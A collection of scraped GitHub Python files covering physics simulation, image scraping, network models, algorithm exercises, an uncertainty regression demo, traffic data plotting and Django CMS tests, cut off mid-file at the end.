+{"seq_id":"4883573718","text":"from __future__ import annotations\n\nfrom typing import TYPE_CHECKING, Dict\n\nimport pymunk\n\nif TYPE_CHECKING:\n from ...entity import Entity\n\nSIMULATION_STEPS = 10\nSPACE_DAMPING = 0.9\n\nPYMUNK_STEPS = 10\n\n\nclass SpaceManager:\n\n space: pymunk.Space\n\n def __init__(self, pymunk_steps=PYMUNK_STEPS, **kwargs):\n assert pymunk_steps > 0\n self.pymunk_steps = pymunk_steps\n self.custom_collision_types: Dict[str, int] = {}\n\n def initialize_space(self):\n \"\"\"Method to initialize Pymunk empty space for 2D physics.\n\n Returns: Pymunk Space\n\n \"\"\"\n self.space = pymunk.Space()\n self.space.gravity = pymunk.Vec2d(0.0, 0.0)\n self.space.damping = SPACE_DAMPING\n\n def pymunk_step(self):\n for _ in range(self.pymunk_steps):\n self.space.step(1.0 / self.pymunk_steps)\n\n def check_overlapping(self, entity: Entity, coordinates: object) -> object:\n\n entity_shapes = entity.get_all_shapes()\n\n # Generate dummy shapes to check for overlaps\n dummy_body = pymunk.Body(body_type=pymunk.Body.STATIC)\n dummy_shapes = entity.get_dummy_shapes(dummy_body)\n\n self.space.add(dummy_body, *dummy_shapes)\n dummy_body.position, dummy_body.angle = coordinates\n\n self.space.reindex_static()\n\n overlaps = []\n for dummy_shape in dummy_shapes:\n overlaps += self.space.shape_query(dummy_shape)\n self.space.remove(dummy_body, *dummy_shapes)\n\n # # remove sensor shapes\n overlaps = [\n elem\n for elem in overlaps\n if elem.shape and not elem.shape.sensor and elem.shape not in entity_shapes\n ]\n\n return bool(overlaps)\n","repo_name":"gaorkl/simple-playgrounds","sub_path":"spg/core/playground/manager/space.py","file_name":"space.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"91"}
+{"seq_id":"17764353495","text":"from urllib.request import urlopen, urlretrieve\nfrom urllib.parse import urlparse, urlunparse\nfrom bs4 import BeautifulSoup\nimport asyncio\nimport concurrent.futures\n\nimport sys\nimport logging\n\nlogging.basicConfig(level=logging.DEBUG)\n\ninfo = '''\n USAGE:\n >> python scrape.py \n'''\n\n\ndef get_paths(url):\n response = urlopen(url)\n content = response.read()\n page = BeautifulSoup(content, 'html.parser')\n\n imgs = page.findAll('img')\n imgs = list(filter(lambda x: not(x['src'] is None), imgs))\n\n srcs = [img['src'] for img in imgs]\n\n return srcs\n\n\ndef sanitize(url):\n logging.info(url)\n parsed_url = urlparse(url)\n if parsed_url.netloc is '':\n return 'https://youtube.com{}'.format(url)\n return url\n\n\nasync def main():\n img_paths = get_paths(sys.argv[1])\n logging.info(f'Number of Links Found: {len(img_paths)}')\n img_paths = list(map(sanitize, img_paths))\n\n with concurrent.futures.ThreadPoolExecutor(max_workers=30) as executor:\n loop = asyncio.get_event_loop()\n futures = [\n loop.run_in_executor(\n executor,\n urlretrieve,\n img_path,\n f'./results/{i}.jpg'\n\n )\n for i, img_path in zip(range(len(img_paths)), img_paths)\n ]\n\n for result in await asyncio.gather(*futures):\n pass\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main())\n","repo_name":"rgabeflores/Task-Automation","sub_path":"Image-Scraper/scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"18210387769","text":"\nimport numpy as np\nimport copy\n\n\nclass UM:\n \"\"\" Utility-based preferential attachment model\n Args:\n m (int): Number of edges added at each step\n coef_k1 (int): Utility coefficient for direct connection\n coef_k2 (int): Utility coefficient for indirect connection\n (>0, otherwise the pool will almost disappear)\n seed (int): Number of seed nodes (ring network)\n N (int): Number of nodes added to the network\n \"\"\"\n def __init__(self, m=1, coef_k1=1, coef_k2=0, seed=5):\n # Initialize & set\n self.m = m\n self.t = 0\n self.coef_k1 = int(coef_k1)\n self.coef_k2 = int(coef_k2)\n\n # Make seed network : ring\n self.nodes = list(range(seed))\n self.N = len(self.nodes)\n self.adjlist_k1 = [[node-1, node+1] for node in range(seed)]\n self.adjlist_k1[0] = [1, seed-1]\n self.adjlist_k1[seed-1] = [0, seed-2]\n self.adjlist_k2 = []\n for node in self.nodes:\n k2_pool = set()\n for node_adj in self.adjlist_k1[node]:\n k2_pool.update(self.adjlist_k1[node_adj])\n k2_pool = k2_pool - set(self.adjlist_k1[node]) - {node}\n self.adjlist_k2 += [list(k2_pool)]\n\n # Make preference pool for utility model\n k1 = [len(adj) for adj in self.adjlist_k1]\n k2 = [len(adj) for adj in self.adjlist_k2]\n u = [int(self.coef_k1 * k1[i] + self.coef_k2 * k2[i]) for i in self.nodes]\n self.pool = []\n for node in self.nodes:\n self.pool += u[node] * [node]\n self.T = len(self.pool)\n if self.T == 0:\n self.T = len(self.nodes)\n self.pool = self.nodes.copy()\n self.U = [copy.deepcopy(self.T)]\n\n # Summation of k1, k2 info\n self.T1 = sum(k1)\n self.T2 = sum(k2)\n self.K1_sum = [copy.deepcopy(self.T1)]\n self.K2_sum = [copy.deepcopy(self.T2)]\n\n # Initial state info\n self.init_node = self.nodes.copy()\n self.init_k2 = [2] * seed\n\n def add_nodes(self, N):\n for i in range(N):\n # Select node\n self.nodes.append(self.N)\n targets = self.pool\n counter = 0\n new_targets_k1 = []\n while counter < self.m:\n r = np.random.randint(self.T)\n if targets[r] not in new_targets_k1:\n counter += 1\n new_targets_k1.append(targets[r])\n\n # 2 distance from selected node\n new_targets_k2 = []\n for j in new_targets_k1:\n for k in self.adjlist_k1[j]:\n if k not in new_targets_k1:\n if k not in new_targets_k2:\n new_targets_k2 += [k]\n if self.m != 1:\n for j in range(self.m - 1):\n for k in range(j+1, self.m):\n if new_targets_k1[j] not in self.adjlist_k2[new_targets_k1[k]]:\n \"\"\" 거리가 1 이상이면 pool에 서로를 추가할 필요가 있음 \"\"\"\n self.pool += self.coef_k2 * [new_targets_k1[j], new_targets_k1[k]]\n self.T += self.coef_k2 * 2\n self.T2 += 2\n \"\"\" m개의 selected node 끼리 서로를 k2 이웃에 추가 \"\"\"\n self.adjlist_k2[new_targets_k1[j]] += [new_targets_k1[k]]\n self.adjlist_k2[new_targets_k1[k]] += [new_targets_k1[j]]\n\n # Update pool\n if self.coef_k1 >= 0:\n for node in new_targets_k1:\n self.pool += self.coef_k1 * [node]\n for node in new_targets_k2:\n self.pool += self.coef_k2 * [node]\n self.pool += self.coef_k1 * self.m * [self.N]\n self.pool += self.coef_k2 * len(new_targets_k2) * [self.N]\n else:\n # If coef_k1 < 0, delete the node from pool according to the new link\n for node in new_targets_k1:\n for _ in range(-self.coef_k1):\n try:\n self.pool.remove(node)\n except:\n pass\n for node in new_targets_k2:\n self.pool += self.coef_k2 * [node]\n v = int(self.coef_k2 * len(new_targets_k2) + self.coef_k1 * self.m)\n # Update pool when only utility is positive\n if v > 0:\n self.pool += v * [self.N]\n\n # Calculate pool size & k1/k2 summation\n self.T += 2 * self.coef_k1 * self.m + 2 * self.coef_k2 * len(new_targets_k2)\n self.T1 += 2 * self.m\n self.T2 += 2 * len(new_targets_k2)\n\n # If there is no node in pool or coefficient is zero, make pool random\n if self.T <= 0:\n self.T = len(self.nodes)\n self.pool = self.nodes.copy()\n if (self.coef_k1 == 0) and (self.coef_k2 == 0):\n self.T = len(self.nodes)\n self.pool = self.nodes.copy()\n\n # Update adjlist list\n for j in new_targets_k1:\n self.adjlist_k1[j] += [self.N]\n for j in new_targets_k2:\n self.adjlist_k2[j] += [self.N]\n self.adjlist_k1 += [new_targets_k1]\n self.adjlist_k2 += [new_targets_k2]\n\n # Update parameters & state info\n self.N += 1\n self.t += 1\n self.U += [copy.deepcopy(self.T)]\n self.K1_sum += [copy.deepcopy(self.T1)]\n self.K2_sum += [copy.deepcopy(self.T2)]\n self.init_k2 += [len(new_targets_k2)]\n\n","repo_name":"mons1220/utility-model","sub_path":"utility_model.py","file_name":"utility_model.py","file_ext":"py","file_size_in_byte":5778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"70163708145","text":"from collections import deque\nfrom math import inf\ndef solution():\n time_map=[[inf] * n_cols for _ in range(n_rows)]\n end_row,end_col=0,0\n water_queue,animal_queue=deque(),deque()\n dy=[-1,0,1,0]\n dx=[0,1,0,-1]\n\n \n for row in range(n_rows):\n for col in range(n_cols):\n #출발점\n if board[row][col]==\"S\":\n animal_queue.append((row,col,0))\n #도착점\n if board[row][col]==\"D\":\n end_row,end_col=row,col\n #물이 있는 자리의 좌표\n if board[row][col]==\"*\":\n water_queue.append((row,col,0))\n \n #물의 이동 수행\n visited=[[False] * n_cols for _ in range(n_rows)]\n while water_queue:\n row,col,time=water_queue.popleft()\n \n #이전에 방문한 경우\n if visited[row][col]:\n continue\n visited[row][col]=True\n #물이 해당 좌표에 도달하는 시간\n time_map[row][col]=time\n \n\n for dir in range(4):\n next_row=row+dy[dir]\n next_col=col+dx[dir]\n #범위를 넘어서는 경우\n if next_row < 0 or next_row>=n_rows or next_col<0 or next_col>=n_cols:\n continue\n #다음 좌표가 돌인 경우\n if board[next_row][next_col]==\"X\":\n continue\n #물은 목적지 좌표에 도달할 수 없다.\n if board[next_row][next_col]==\"D\":\n continue\n\n water_queue.append((next_row,next_col,time+1))\n \n #고슴도치의 이동 수행\n visited=[[False] * n_cols for _ in range(n_rows)]\n while animal_queue:\n row,col,time=animal_queue.popleft()\n #목적지에 도달한 경우\n if (row,col)==(end_row,end_col):\n print(time)\n return\n #이전에 방문한 경우\n if visited[row][col]:\n continue\n visited[row][col]=True\n\n for dir in range(4):\n next_row=row+dy[dir]\n next_col=col+dx[dir]\n #범위를 벗어나는 경우\n if next_row < 0 or next_row>=n_rows or next_col<0 or next_col>=n_cols:\n continue\n #다음 좌표가 돌인 경우\n if board[next_row][next_col]==\"X\":\n continue\n \n #해당 자리에 물이 먼저 도착하는 경우에는 다음 좌표로 이동 불가능\n if time_map[next_row][next_col] <= time+1:\n continue\n animal_queue.append((next_row,next_col,time+1))\n\n print(\"KAKTUS\")\n\n\nif __name__ == \"__main__\":\n with open(\"input3055.txt\",\"r\") as file:\n n_rows,n_cols=map(int,file.readline().split())\n board=[list(file.readline().strip()) for _ in range(n_rows)]\n \n solution()","repo_name":"JehyunJung/Code-Test-Preparing","sub_path":"algorithm/Tasks_By_Algorithms/DFS&BFS/3055.py","file_name":"3055.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"8924039711","text":"### Link:\n# https://github.com/doocs/leetcode/blob/main/solution/0100-0199/0153.Find%20Minimum%20in%20Rotated%20Sorted%20Array/README.md\n\n\n\n### Description:\n# 已知一个长度为 n 的数组,预先按照升序排列,\n# 经由 1 到 n 次 旋转后,得到输入数组。\n\n# 例��,原数组 nums = [0, 1, 2, 4, 5, 6, 7] 在变化后可能得到:\n# 若旋转 4 次,则可以得到[4, 5, 6, 7, 0, 1, 2]\n# 若旋转 7 次,则可以得到[0, 1, 2, 4, 5, 6, 7]\n\n# 注意,数组[a[0], a[1], a[2], ..., a[n - 1]]\n# 旋转一次 的结果为数组[a[n - 1], a[0], a[1], a[2], ..., a[n - 2]] \n\n# 给你一个元素值 互不相同 的数组 nums \n# 它原来是一个升序排列的数组,并按上述情形进行了多次旋转\n# 请你找出并返回数组中的最小元素 \n\n\n\n### Example:\n# 示例 1:\n# 输入: nums = [3, 4, 5, 1, 2]\n# 输出: 1\n# 解释:原数组为[1, 2, 3, 4, 5],\n# 旋转 3 次得到输入数组。\n\n# 示例2:\n# 输入:nums = [4, 5, 6, 7, 0, 1, 2]\n# 输出:0\n# 解释:原数组为[0, 1, 2, 4, 5, 6, 7] ,旋转 4 次得到输入数组。\n\n# 示例3:\n# 输入:nums = [11, 13, 15, 17]\n# 输出:11\n# 解释:原数组为[11, 13, 15, 17] ,旋转 4 次得到输入数组。\n\n\n# 提示:\n# n == nums.length\n# 1 <= n <= 5000\n# -5000 <= nums[i] <= 5000\n\n\n# nums 中的所有整数 互不相同\n# nums 原来是一个升序排序的数组,\n# 并进行了 1 至 n 次旋转\n\n\n\n### Solution:\n# 二分查找\n# 若 nums[m] > nums[r],说明最小值在 m 的右边\n# 否则说明最小值在 m 的左边\n\nclass Solution:\n def findMin(self, nums):\n l, r = 0, len(nums) - 1\n if nums[l] < nums[r]:\n return nums[0]\n while l < r:\n m = (l + r) // 2\n if nums[m] > nums[r]:\n l = m + 1\n else:\n r = m\n return nums[l]\n\n\nprint(Solution().findMin(nums=[5,7,9,1,3,4]))\nprint(Solution().findMin(nums=[9,2,4,6,7,8]))\n","repo_name":"wendyZhang98/Leetcode-Solutions","sub_path":"Array/[二分查找]Find Minimum in Rotated Sorted Array.py","file_name":"[二分查找]Find Minimum in Rotated Sorted Array.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"19695776348","text":"\"\"\"\nThis is a file for trying out Pylint\n\"\"\"\nimport os\n# import this_does_not_exist\n\n\ndef open_foo_file(): # method that does a thing\n \"\"\"Method that does a thing\"\"\"\n try:\n os.chdir(\"subdir\")\n filedesc = open(\"foo.txt\", \"w\", encoding=\"utf8\")\n contents = filedesc.readlines()\n filedesc.close()\n except IOError:\n print(\"couldn't find the file or directory\")\n return contents\n\n\nif __name__ == \"__main__\":\n open_foo_file()\n","repo_name":"TheMany172/Makers_extending_testing_week2","sub_path":"extending-testing/phase6/04_resources/lint_me.py","file_name":"lint_me.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"42021522643","text":"#!/usr/bin/env python\n# coding: utf-8\n\nfrom keras_uncertainty.losses import regression_gaussian_nll_loss, regression_gaussian_beta_nll_loss\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom keras.layers import Dense, Input\nimport tensorflow as tf\n\nfrom tensorflow import keras\nfrom tensorflow.keras.models import Model\nfrom sklearn.model_selection import train_test_split\n\n\"\"\"\nCode provided by the assignment and retrieved from:\nhttps://github.com/mvaldenegro/keras-uncertainty/blob/master/keras_uncertainty/losses.py\nWe use the Gaussian Negative Log-Likelihood loss: \nLoss commonly used in uncertainty quantification and probabilistic forecasting\n\"\"\"\nimport keras_uncertainty.backend as K\n\ntf.compat.v1.disable_eager_execution()\n\n\"\"\"\nCreates a model (one dense input layer, one hidden dense layer,\n1 dense output layer for mean and another one for variance.\nReturns the predicted mean and std (squared variance).\n\"\"\"\ndef train_standard_model(x_train, y_train, domain):\n inp = Input(shape=(1,))\n x = Dense(32, activation=\"relu\")(inp)\n x = Dense(32, activation=\"relu\")(x)\n mean = Dense(1, activation=\"linear\")(x)\n var = Dense(1, activation=\"softplus\")(x)\n\n train_model = Model(inp, mean)\n pred_model = Model(inp, [mean, var])\n\n opt = keras.optimizers.Adam (learning_rate=0.0001)\n\n train_model.compile(loss=regression_gaussian_nll_loss(var), optimizer=opt)\n pred_model.compile (loss=regression_gaussian_nll_loss (var), optimizer=opt)\n train_model.fit(x_train, y_train, verbose=2, epochs=300)\n\n mean_pred, var_pred = pred_model.predict(domain)\n std_pred = np.sqrt(var_pred)\n\n return mean_pred, std_pred\n\n# amplitude for noise\nA = 3\n\n# number of samples for training the model\nnum_samples = 10000\n\n# generating an amount of num_samples between -5 and 5\nsample = np.linspace(-5, 5, num=num_samples)\nprint(\"Input array : \\n\", sample)\n\nnoise_sigma = 0.5\n\n# transform the data samples into sinusoid function and add noise\nx = A * np.sin(sample) + np.random.normal(loc = 0.0, scale = noise_sigma, size = num_samples)\ny = A * np.sin(sample)\ny = y.reshape((-1, 1))\n\n# split data samples and their labels into training and testing\ndata_train,data_test,labels_train,labels_test = train_test_split(x,y, test_size = 0.40)\n\nprint(f'μ={y.mean()}')\nprint(f'σ={y.std()}')\n\n# train the model, return predicted mean and std\npredicted_mean, predicted_std=train_standard_model(data_train, labels_train, y)\n\ny_pred_mean = predicted_mean.reshape((-1,))\ny_pred_std = predicted_std.reshape((-1,))\n\n# add the upper and lower std to the mean\ny_pred_up_1 = y_pred_mean + y_pred_std\ny_pred_down_1 = y_pred_mean - y_pred_std\n\n\nprint (f'average standard deviation: {np.mean(y_pred_std)}')\n\n# plot the noisy data points on which the model trained\nplt.scatter (range (len (x)), x, label=\"Noisy Data Points\", color='green')\nplt.plot(y, label= \"Sine\", linewidth = 3)\n\n# plot the predicted mean\nplt.plot(y_pred_mean, label = \"Predicted mean\", linewidth = 3)\n# plot std on the mean\nplt.fill_between (range (num_samples), y_pred_mean-y_pred_std, y_pred_mean+y_pred_std, alpha=0.2, label=\"Standard Deviation\", color='orange')\nplt.legend()\nplt.show ()\n","repo_name":"SarahEmaAllam/Uncertainty-in-ML","sub_path":"week 1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"20275404096","text":"from JMSSGraphicsV12 import *\nimport math\n\nwidth = 1200\nheight = 800\nfps = 60\n\njmss = Graphics(width = width, height = height, title = \"Bouncing Ball\", fps = fps)\n\nball = jmss.loadImage(\"ball.png\")\n\nball_pos = [0,0]\nspeed = 0\ncount = 0\n\n@jmss.mainloop\ndef Parabola():\n global ball_pos, speed, count\n\n ball_pos[0] = 0\n jmss.clear(0,0,0,1)\n\n while ball_pos[0] <= 1152:\n ball_pos[1] = 200*math.sin(2*ball_pos[0] - speed)+400\n jmss.drawImage(ball, ball_pos[0], ball_pos[1])\n ball_pos[0] += (22 + count)\n\n jmss.drawText(str(count + 22), 0, 0)\n\n if jmss.isKeyDown(KEY_SPACE) != True:\n count += 0.003\n speed += 0.03\n\njmss.run()\n","repo_name":"MAK064/Python","sub_path":"Big Data Challenges/WaveForms.py","file_name":"WaveForms.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"34031808381","text":"#import Traffic_DFs, Traffic_Dataframe, parsing\nimport os,io,re\nimport matplotlib.pyplot as plt \nplt.style.use('ggplot')\nimport seaborn as sns\nimport numpy as np\nimport csv\nimport itertools as it \nimport glob\nimport pandas as pd \nfrom scipy import interpolate\nimport time\n\n#combine all csv files in the csv folder\n\t\nBASE = \"/Users/radhikanikam/Downloads/Traffic_Data\"\nPATH = \"/Day3/CSV/\"\n\ndef get_daily(PATH,axis):\n\tax = axis\n\tfolder = BASE+PATH\n\tos.chdir(folder)\n\tfiles = glob.glob('*.csv')\n\tf = {}\n\tdata = pd.DataFrame()\n\theader_saved = False\n\t#with open('output.csv','w') as fout:\n\tdata = pd.read_csv(files[0])\n\tdata = data[['LinkID','RoadName']].reset_index(drop = True)\n\tprint(len(files))\n\tfor i in range(len(files)):\n\t\tres = re.findall(\"\\d+\", files[i])\n\t\tf[i] = pd.read_csv(files[i])\n\t\tf[i][['Speed' + str(res)]] = f[i][['Speed']]\n\t\tf[i] = f[i][['LinkID','Speed'+str(res)]].reset_index(drop = True)\n\t\tdata = pd.merge(data,f[i],on = 'LinkID', how = 'outer', left_index = True)\t\n\t\t#data[['Speed' + str(i)]] =(f[i][['Speed' + str(i)]])\t\t\n\t#print(data.head())\n\tfill_value = pd.DataFrame({col: data.mean(axis=1) for col in data.columns})\n\t#data.fillna(fill_value) \n\t#data = data.fillna(data.mean(axis=0))\n\t#data.to_csv('Day_stats.csv')\n\t#g = sns.FacetGrid(data, row = data.loc[data['RoadName'] == 'SANDY LANE'])\n\t#g = g.map(plt.hist,)\n\tdata.drop(['LinkID'], inplace = True)\n\t\n\t\n\tlabels = data.columns[2:]\n\tx = data.as_matrix()\n\troad1 = 'OUTRAM ROAD'\n\troad2 = 'TIONG BAHRU ROAD'\n\troad3 = 'KEPPEL ROAD'\n\txes = np.array((data[data['RoadName'] == road1].as_matrix()[0,2:]).tolist())\n\txis = np.array((data[data['RoadName'] == road2].as_matrix()[0,2:]).tolist())\n\txas = np.array((data[data['RoadName'] == road3].as_matrix()[0,2:]).tolist())\n\tcall =np.array([i for i in range(len(xes))])\n\t#print(xes)\n\t# xe = np.arange(0,75)\n\ts1mask = np.isfinite(xes)\n\ts2mask = np.isfinite(xis)\n\ts3mask = np.isfinite(xas)\n\n\t# f = interpolate.interp1d(call,xes, kind = 'linear') #,fill_value =\"extrapolation\")\n\t# plt.plot(call,xes,'o', f(xe),'-')\n\t# plt.xticks(call,labels, rotation = '90')\n\t# #data[data['RoadName'] == 'SANDY LANE'].plot.bar()\n\n\t# from scipy.interpolate import spline\n\n\t# xnew = np.linspace(call[0],call[len(call) -1],len(call)) #300 represents number of points to make between T.min and T.max\n\n\t#f= interpolate.interp1d(call,xes) #,fill_value =\"extrapolation\")\n\t\n\tax.plot(call[s1mask],xes[s1mask],marker = 'o',linestyle = '-', label = road1)\n\tax.plot(call[s2mask],xis[s2mask],marker = 'o',linestyle = '-', label = road2)\n\tax.plot(call[s3mask],xas[s3mask],marker = 'o',linestyle = '-', label = road3)\n\tplt.xticks(call,labels, rotation = '90')\n\tax.legend(loc = 'best')\n\t#plt.savefig(str(axis) +'.png')\n\t\n\nif __name__ == \"__main__\":\n\tfig = plt.figure()\n\tax1 = fig.add_subplot(211)\n\tax1.set_title('Thursday')\n\tt1 = time.time()\n\tget_daily(PATH,ax1)\n\tt2 = time.time()\n\tprint(t2-t1)\n\tPATH =\"/Day4/CSV/\"\n\tax2 = fig.add_subplot(212)\n\tax2.set_title('Friday')\n\tget_daily(PATH,ax2)\n\tplt.show()\n\n","repo_name":"radsn23/ITS_thesis","sub_path":"daily_trend.py","file_name":"daily_trend.py","file_ext":"py","file_size_in_byte":2979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"19927057164","text":"# -*- coding: utf-8 -*-\n\"\"\"Django page CMS functionnal tests suite module.\"\"\"\nfrom basic_cms.models import Page, Content, PageAlias\nfrom basic_cms.tests.testcase import TestCase\n\nimport django\n\nimport datetime\n\n\nclass FunctionnalTestCase(TestCase):\n \"\"\"Django page CMS functionnal tests suite class.\"\"\"\n\n def test_add_page(self):\n \"\"\"Test that the add admin page could be displayed via the\n admin\"\"\"\n c = self.get_admin_client()\n\n response = c.get('/admin/basic_cms/page/add/')\n self.assertEqual(response.status_code, 200)\n\n def test_create_page(self):\n \"\"\"Test that a page can be created via the admin.\"\"\"\n c = self.get_admin_client()\n\n page_data = self.get_new_page_data()\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertRedirects(response, '/admin/basic_cms/page/')\n slug_content = Content.objects.get_content_slug_by_slug(\n page_data['slug']\n )\n assert(slug_content is not None)\n page = slug_content.page\n self.assertEqual(page.title(), page_data['title'])\n self.assertEqual(page.slug(), page_data['slug'])\n self.assertNotEqual(page.last_modification_date, None)\n\n def test_delete_page(self):\n \"\"\"Create a page, then delete it.\"\"\"\n c = self.get_admin_client()\n page_data = self.get_new_page_data()\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertRedirects(response, '/admin/basic_cms/page/')\n slug_content = Content.objects.get_content_slug_by_slug(\n page_data['slug']\n )\n assert(slug_content is not None)\n pageCount = Page.objects.count()\n page = slug_content.page\n page.delete()\n slug_content = Content.objects.get_content_slug_by_slug(\n page_data['slug']\n )\n assert(slug_content is None)\n self.assertEqual(Page.objects.count(), pageCount - 1)\n\n def test_slug_collision(self):\n \"\"\"Test a slug collision.\"\"\"\n self.set_setting(\"PAGE_UNIQUE_SLUG_REQUIRED\", True)\n\n c = self.get_admin_client()\n\n page_data = self.get_new_page_data()\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertRedirects(response, '/admin/basic_cms/page/')\n self.set_setting(\"PAGE_UNIQUE_SLUG_REQUIRED\", False)\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertEqual(response.status_code, 200)\n\n page1 = Content.objects.get_content_slug_by_slug(page_data['slug']).page\n page_data['position'] = 'first-child'\n page_data['target'] = page1.id\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertRedirects(response, '/admin/basic_cms/page/')\n page2 = Content.objects.get_content_slug_by_slug(page_data['slug']).page\n self.assertNotEqual(page1.id, page2.id)\n\n def test_details_view(self):\n \"\"\"Test the details view basics.\"\"\"\n\n c = self.get_admin_client()\n\n response = c.get(self.get_page_url())\n self.assertEqual(response.status_code, 404)\n\n page_data = self.get_new_page_data()\n page_data['status'] = Page.DRAFT\n response = c.post('/admin/basic_cms/page/add/', page_data)\n\n response = c.get(self.get_page_url())\n self.assertEqual(response.status_code, 200)\n\n page_data = self.get_new_page_data()\n page_data['status'] = Page.PUBLISHED\n page_data['slug'] = 'test-page-2'\n page_data['template'] = 'pages/examples/index.html'\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertRedirects(response, '/admin/basic_cms/page/')\n\n response = c.get(self.get_page_url('test-page-2'))\n self.assertEqual(response.status_code, 200)\n\n def test_edit_page(self):\n \"\"\"Test that a page can edited via the admin.\"\"\"\n c = self.get_admin_client()\n c.login(username='batiste', password='b')\n page_data = self.get_new_page_data()\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertRedirects(response, '/admin/basic_cms/page/')\n page = Page.objects.all()[0]\n response = c.get('/admin/basic_cms/page/%d/' % page.id)\n self.assertEqual(response.status_code, 200)\n page_data['title'] = 'changed title'\n page_data['body'] = 'changed body'\n response = c.post('/admin/basic_cms/page/%d/' % page.id, page_data)\n self.assertRedirects(response, '/admin/basic_cms/page/')\n page = Page.objects.get(id=page.id)\n self.assertEqual(page.title(), 'changed title')\n body = Content.objects.get_content(page, 'en-us', 'body')\n self.assertEqual(body, 'changed body')\n\n def test_site_framework(self):\n \"\"\"Test the site framework, and test if it's possible to\n disable it.\"\"\"\n\n from basic_cms import settings as pages_settings\n\n # it's not possible to enforce PAGE_USE_SITE_ID in the tests\n if not pages_settings.PAGE_USE_SITE_ID:\n #TODO: use unittest.skip skip when 2.7\n return\n\n # this is necessary to make the test pass\n setattr(pages_settings, \"SITE_ID\", 2)\n\n c = self.get_admin_client()\n c.login(username='batiste', password='b')\n page_data = self.get_new_page_data()\n page_data[\"sites\"] = [2]\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertRedirects(response, '/admin/basic_cms/page/')\n\n page = Content.objects.get_content_slug_by_slug(page_data['slug']).page\n self.assertEqual(page.sites.count(), 1)\n self.assertEqual(page.sites.all()[0].id, 2)\n\n page_data = self.get_new_page_data()\n page_data[\"sites\"] = [3]\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertRedirects(response, '/admin/basic_cms/page/')\n\n # we cannot get a slug that doesn't exist\n content = Content.objects.get_content_slug_by_slug(\"this doesn't exist\")\n self.assertEqual(content, None)\n\n # we cannot get the data posted on another site\n content = Content.objects.get_content_slug_by_slug(page_data['slug'])\n self.assertEqual(content, None)\n\n setattr(pages_settings, \"SITE_ID\", 3)\n page = Content.objects.get_content_slug_by_slug(page_data['slug']).page\n self.assertEqual(page.sites.count(), 1)\n self.assertEqual(page.sites.all()[0].id, 3)\n\n # with param\n self.assertEqual(Page.objects.on_site(2).count(), 1)\n self.assertEqual(Page.objects.on_site(3).count(), 1)\n\n # without param\n self.assertEqual(Page.objects.on_site().count(), 1)\n setattr(pages_settings, \"SITE_ID\", 2)\n self.assertEqual(Page.objects.on_site().count(), 1)\n\n page_data = self.get_new_page_data()\n page_data[\"sites\"] = [2, 3]\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertRedirects(response, '/admin/basic_cms/page/')\n\n self.assertEqual(Page.objects.on_site(3).count(), 2)\n self.assertEqual(Page.objects.on_site(2).count(), 2)\n self.assertEqual(Page.objects.on_site().count(), 2)\n\n setattr(pages_settings, \"PAGE_USE_SITE_ID\", False)\n\n # we should get everything\n self.assertEqual(Page.objects.on_site().count(), 3)\n\n setattr(pages_settings, \"SITE_ID\", 1)\n\n def test_languages(self):\n \"\"\"Test post a page with different languages\n and test that the admin views works correctly.\"\"\"\n c = self.get_admin_client()\n c.login(username='batiste', password='b')\n\n # test that the client language setting is used in add page admin\n c.cookies[\"django_language\"] = 'de'\n response = c.get('/admin/basic_cms/page/add/')\n\n self.assertContains(response, 'value=\"de\"')\n\n page_data = self.get_new_page_data()\n page_data[\"title\"] = 'english title'\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertRedirects(response, '/admin/basic_cms/page/')\n\n page = Page.objects.all()[0]\n self.assertEqual(page.get_languages(), ['en-us'])\n\n # test the language cache\n self.assertEqual(page.get_languages(), ['en-us'])\n\n # this test only works in version superior of 1.0.2\n django_version = django.get_version().rsplit()[0].split('.')\n if len(django_version) > 2:\n major, middle, minor = [int(v) for v in django_version]\n else:\n major, middle = [int(v) for v in django_version]\n if major >= 1 and middle > 0:\n response = c.get('/admin/basic_cms/page/%d/?language=de' % page.id)\n self.assertContains(response, 'value=\"de\"')\n\n # add a french version of the same page\n page_data[\"language\"] = 'fr-ch'\n page_data[\"title\"] = 'french title'\n response = c.post('/admin/basic_cms/page/%d/' % page.id, page_data)\n self.assertRedirects(response, '/admin/basic_cms/page/')\n\n # test that the frontend view use the good parameters\n # I cannot find a way of setting the accept-language HTTP\n # header so I used django_language cookie instead\n c = self.get_admin_client()\n c.cookies[\"django_language\"] = 'en-us'\n response = c.get(page.get_url_path())\n self.assertContains(response, 'english title')\n self.assertContains(response, 'lang=\"en-us\"')\n self.assertNotContains(response, 'french title')\n\n c = self.get_admin_client()\n c.cookies[\"django_language\"] = 'fr-ch'\n response = 